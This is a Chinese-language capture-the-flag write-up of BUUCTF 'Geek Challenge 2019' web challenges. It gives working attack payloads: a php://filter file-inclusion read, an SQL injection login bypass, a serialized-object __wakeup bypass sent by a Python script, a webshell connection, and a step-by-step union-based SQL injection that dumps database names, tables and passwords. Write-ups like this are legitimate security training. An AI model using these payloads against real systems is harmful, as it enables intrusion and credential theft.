BUUCTF web 极客大挑战 2019

0x01 Secret File

 在源码之中得到一个php页面
在这里插入图片描述
 后面页面之中
BUUCTF web 极客大挑战 2019_第1张图片
BUUCTF web 极客大挑战 2019_第2张图片
 根据提示抓包,在其中返回的页面得到了信息
BUUCTF web 极客大挑战 2019_第3张图片
 得到源码,根据源码,发现存在文件包含漏洞
BUUCTF web 极客大挑战 2019_第4张图片
 利用php伪协议,获取flag.php的信息,拿取flag
payload:

?file=php://filter/read=convert.base64-encode/resource=flag.php

EasySQL

 利用万能密码,直接得到flag

admin' or 1=1#

PHP

BUUCTF web 极客大挑战 2019_第5张图片
 经过测试,找到了www.zip这个备份文件。
BUUCTF web 极客大挑战 2019_第6张图片
 index.php中找到了一个反序列化的php函数:
BUUCTF web 极客大挑战 2019_第7张图片
 class.php里面存在一个类:
BUUCTF web 极客大挑战 2019_第8张图片
 根据类里面的信息,需要绕过__wakeup()获取flag,具体可以更改序列化后类属性的字段,大于本身的字段就可以绕过。
 私有属性反序列化之后,其属性名前面需要加\0。
payload:

import requests
s = 'O:4:"Name":3:{s:14:"\0Name\0username";s:5:"admin";s:14:"\0Name\0password";i:100;}'
url = 'http://32eeec15-b10b-477f-9dc9-3d492ae6c7df.node3.buuoj.cn/?select='
r = requests.get(url+s)
r.text

Knife

 菜刀连接,在根目录找到flag

LoveSQL

BUUCTF web 极客大挑战 2019_第9张图片
 首先尝试万能密码admin’ or 1=1#,成功登录进去
BUUCTF web 极客大挑战 2019_第10张图片
 尝试在username注入:

// order by 注入查看字段,检查出字段为3
?username=admin%27+order+by+4%23&password=123

//联合注入,查找数据库
?username=admin1%27+union+select+1,2,group_concat(schema_name)+from+information_schema.schemata%23&password=123
//information_schema,test,performance_schema,mysql,geek,geek是当前数据库

//搜索geek数据库的表名
?username=admin1%27+union+select+1,2,group_concat(table_name)+from+information_schema.tables+where+table_schema='geek'%23&password=123
//geekuser,l0ve1ysq1

//查询表l0ve1ysq1
?username=admin1%27+union+select+1,2,group_concat(column_name)+from+information_schema.columns+where+table_schema='geek'+and+table_name='l0ve1ysq1'%23&password=123
//id,username,password

//查询password字段,得到flag
?username=admin1%27+union+select+1,2,group_concat(password)+from+l0ve1ysq1%23&password=123
个人微信公众号,喜欢的话,随手关注一下啦

在这里插入图片描述

你可能感兴趣的:(ctf_web)